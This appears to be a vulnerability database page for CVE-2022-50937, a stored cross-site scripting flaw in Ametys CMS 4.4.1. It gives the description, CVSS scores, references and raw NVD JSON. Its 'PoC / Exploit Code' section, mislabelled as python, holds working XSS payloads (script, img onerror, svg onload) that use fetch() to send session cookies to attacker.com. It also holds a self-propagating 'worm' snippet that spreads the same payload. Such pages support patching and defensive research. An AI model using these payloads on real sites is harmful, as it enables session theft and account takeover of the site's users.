CVE-2022-50937

Description

Ametys CMS v4.4.1 contains a persistent cross-site scripting vulnerability in the link directory's input fields for external links. Attackers can inject malicious script code in link text and descriptions to execute persistent attacks that compromise user sessions and manipulate application modules.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ametys:ametys:4.4.1:*:*:*:*:*:*:* - VULNERABLE

Ametys CMS < 4.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2022-50937 PoC: Stored XSS in Ametys CMS Link Directory -->
<!-- Target: Ametys CMS v4.4.1 Link Directory External Links Input Fields -->

<!-- Step 1: Inject malicious script in link text field -->
<script>
  // Malicious payload to steal session cookies
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie))
</script>

<!-- Alternative payload using img onerror -->
<img src=x onerror="fetch('https://attacker.com/log?data='+btoa(document.cookie))">

<!-- Step 2: XSS payload in description field -->
<svg/onload=fetch('https://attacker.com/cookie?c='+document.cookie)>

<!-- Step 3: Self-propagating XSS worm payload -->
<script>
  var payload = '<script>fetch("https://attacker.com/exfil?c="+document.cookie)<\/script>';
  // Automatically inject into other links
  document.querySelectorAll('.link-title, .link-description').forEach(function(el) {
    if(el.innerHTML.indexOf('CVE-2022-50937') > -1) {
      el.innerHTML += payload;
    }
  });
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50937
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50937
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50937/
[4] VulDB https://vuldb.com/cve/CVE-2022-50937
[5] https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html
[6] https://www.exploit-db.com/exploits/50692
[7] https://www.vulncheck.com/advisories/ametys-cms-cross-site-scripting-xss
[8] https://www.vulnerability-lab.com/get_content.php?id=2275
[9] https://www.exploit-db.com/exploits/50692
[10] https://www.vulnerability-lab.com/get_content.php?id=2275

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50937", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:58.880", "lastModified": "2026-02-02T16:16:17.303", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ametys CMS v4.4.1 contains a persistent cross-site scripting vulnerability in the link directory's input fields for external links. Attackers can inject malicious script code in link text and descriptions to execute persistent attacks that compromise user sessions and manipulate application modules."}, {"lang": "es", "value": "Ametys CMS v4.4.1 contiene una vulnerabilidad de cross-site scripting persistente en los campos de entrada del directorio de enlaces para enlaces externos. Los atacantes pueden inyectar código de script malicioso en el texto y las descripciones de los enlaces para ejecutar ataques persistentes que comprometen las sesiones de usuario y manipulan los módulos de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ametys:ametys:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A368AF26-84E1-487B-8B9D-F506C23327BB"}]}]}], "references": [{"url": "https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50692", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/ametys-cms-cross-site-scripting-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2275", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50692", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2275", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}